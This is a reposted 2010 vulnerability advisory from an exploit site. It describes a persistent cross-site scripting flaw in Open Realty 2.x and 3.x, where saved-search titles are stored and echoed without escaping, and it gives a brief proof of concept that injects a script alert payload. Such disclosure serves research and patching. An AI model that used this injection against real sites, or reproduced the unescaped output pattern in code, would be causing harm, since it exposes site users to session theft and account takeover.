Open Realty 2.x and 3.x Persistent XSS Vulnerability
<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Open Realty 2.x and 3.x Persistent XSS Vulnerability</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>====================================================
Open Realty 2.x and 3.x Persistent XSS Vulnerability
====================================================
# Author: K053 <K053.dev0te3 at gmail>
# Date: 2010-7-24
# Hompage: http://open-realty.org
# Download Link: http://www.open-realty.org/download.html
# Version: 3.x & 2.x < seems all version >
======================================================================================================
Detail :
========
function save_search(){
…
…
// $title contain user supplied serach result name which save in DB without any input validation
if ($num_columns == 0) {
$sql = "INSERT INTO " . $config['table_prefix'] . "usersavedsearches
(userdb_id, usersavedsearches_title, usersavedsearches_query_string,
usersavedsearches_last_viewed,usersavedsearches_new_listings,usersavedsearches_notify)
VALUES ($userID, $title, $query,now(),0, $notify)";
…
…
}
function view_saved_searches()
{
…
…
else {
while (!$recordSet->EOF) {
$title = $misc->make_db_unsafe($recordSet->fields['usersavedsearches_title']);
if ($title == ”) {
$title = $lang['saved_search'];
}
$display .= ‘<a href="index.php?action=searchresults&’ . $misc->make_db_unsafe
($recordSet->fields['usersavedsearches_query_string']) . ‘">’ . $title . ‘</a>
<div class="note"><a href="index.php?action=delete_search&
searchID=’ . $misc->make_db_unsafe($recordSet->fields['usersavedsearches_id']) . ‘"
onclick="return confirmDelete()">’ . $lang['delete_search'] . ‘</a></div><br /><br />’;
$recordSet->MoveNext();
}
}
}else {
$display = $status;
}
// and no output validation, $display passed immediately
return $display;
======================================================================================================
POC :
=====
load http://address/index.php?action=save_search < note some parameter set by passed url >
in textbox enter <script>alert(0)</scritp>.
load http://address/index.php?action=view_saved_searches to view result
______________________________________________________________________________________________________
~Blackout Frenzy [http://b0f.ir]
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-24]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13462
Leave a Reply